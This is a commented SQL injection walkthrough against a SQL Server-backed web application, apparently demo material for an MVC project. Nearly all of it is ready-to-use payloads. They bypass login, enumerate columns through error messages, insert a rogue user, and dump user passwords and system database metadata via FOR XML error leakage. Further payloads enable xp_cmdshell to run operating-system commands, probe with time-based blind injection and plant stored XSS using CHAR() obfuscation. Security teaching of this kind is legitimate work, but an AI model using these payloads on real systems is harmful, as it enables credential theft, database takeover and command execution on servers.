' OR 1=1 --
// What follows is a step-by-step guessing game designed 
// to find out column names used in the query, via the 
// error messages. By using GROUP BY we will get 
// the column names one by one.
// First try the Id
' GROUP BY Id HAVING 1=1--

// We get the SQL error: Invalid column name 'Id'.
// From that we know that there's no column named Id. 
// Next up is UserID
' GROUP BY Users.UserId HAVING 1=1--

// AHA! here we get the error: Column 'Users.UserName' is 
// invalid in the SELECT list because it is not contained 
// in either an aggregate function or the GROUP BY clause.
// We have guessed correctly that there is a column called 
// UserId and the error message has kindly informed us of 
// a table called Users with a column called UserName
// Now we add UserName to our GROUP BY
' GROUP BY Users.UserId, Users.UserName HAVING 1=1--

// We get the same error as before but with a new column 
// name, Users.UserPassword
// Repeat this pattern till we have all column names that 
// are being return by the query.
// Now we have to get the column data types. One non-string 
// data type is all we need to wreck havoc
// Because 0 can be implicitly converted to any data type in SQL server we use it to fill up the UNION.
// This can be done because we know the number of columns the query returns FROM our previous hacks.
// Because SUM works for UserId we know it's an integer type. It doesn't matter which exactly.
' UNION SELECT SUM(Users.UserId), 0, 0 FROM Users--

// SUM() errors out for UserName and UserPassword columns giving us their data types:
// Error: Operand data type varchar is invalid for SUM operator.
' UNION SELECT SUM(Users.UserName) FROM Users--

// Error: Operand data type nvarchar is invalid for SUM operator.
' UNION SELECT SUM(Users.UserPassword) FROM Users--

// Because we know the Users table structure we can insert our data into it
'; INSERT INTO Users(UserName, UserPassword) SELECT 'Hacker user', 'Hacker pwd'; --

// Next let's get the actual data FROM the tables.
// There are 2 ways you can do this.
// The first is by using MIN on the varchar UserName column and 
// getting the data from error messages one by one like this:
' UNION SELECT min(UserName), 0, 0 FROM Users --
' UNION SELECT min(UserName), 0, 0 FROM Users WHERE UserName > 'Mladen'--

// we can repeat this method until we get all data one by one
// The second method gives us all data at once and we can use it as soon as we find a non string column
' UNION SELECT (SELECT * FROM Users FOR XML RAW) as c1, 0, 0 --

// The error we get is: 
// Conversion failed when converting the nvarchar value 
// '<row UserId="1" UserName="User 1" UserPassword="MyPwd"/>
//  <row UserId="2" UserName="User 2" UserPassword="BlaBla"/>
//  <row UserId="3" UserName="Hacker user" UserPassword="Hacker pwd"/>' 
// to data type int.
// We can see that the returned XML contains all table data including our injected user account.
// By using the XML trick we can get any database or server info we wish as long as we have access
// Some examples:
// Get info for all databases
' UNION SELECT (SELECT name, dbid, convert(nvarchar(300), sid) as sid, cmptlevel, filename FROM master..sysdatabases FOR XML RAW) as c1, 0, 0 --

// Get info for all tables in master database
' UNION SELECT (SELECT * FROM master.INFORMATION_SCHEMA.TABLES FOR XML RAW) as c1, 0, 0 --

// If that's not enough here's a way the attacker can gain shell access to your underlying windows server
// This can be done by enabling and using the xp_cmdshell stored procedure
// Enable xp_cmdshell
'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; --

// Create a table to store the values returned by xp_cmdshell
'; CREATE TABLE ShellHack (ShellData NVARCHAR(MAX))--

// list files in the current SQL Server directory with xp_cmdshell and store it in ShellHack table 
'; INSERT INTO ShellHack EXEC xp_cmdshell "dir d:\"--

// return the data via an error message
' UNION SELECT (SELECT * FROM ShellHack FOR XML RAW) as c1, 0, 0; --

// delete the table to get clean output (this step is optional)
	

// let's look at our IP address and the list of servers in the domain
'; INSERT INTO ShellHack EXEC xp_cmdshell "ipconfig"; --
'; INSERT INTO ShellHack EXEC xp_cmdshell "net view"; --
' UNION SELECT (SELECT * FROM ShellHack FOR XML RAW) as c1, 0, 0; --

// let's upload a file 
see FileUpload.sql

// Blind sql injection
' IF (LEFT(SUSER_NAME(), 1) = 'Z') WAITFOR DELAY '00:00:05' --

// add the malicious script via simple XSS (Cross-Site Scripting) attack
// it will fail, because MVC is smart enough to detect this
'; INSERT INTO Users(UserName, UserDescription) SELECT 'BadScript', '<script src="../Content/BadJS.js"></script>'; --





// let's get smarter! Advanced XSS via sql server CHAR function
	'; INSERT INTO Users(UserName, UserDescription) SELECT 'BadScript', char(60) + 'script src="../Content/BadJS.js"'+char(62)+char(60)+'/script'+char(62); --


// CRSF
/Home/UserDetails


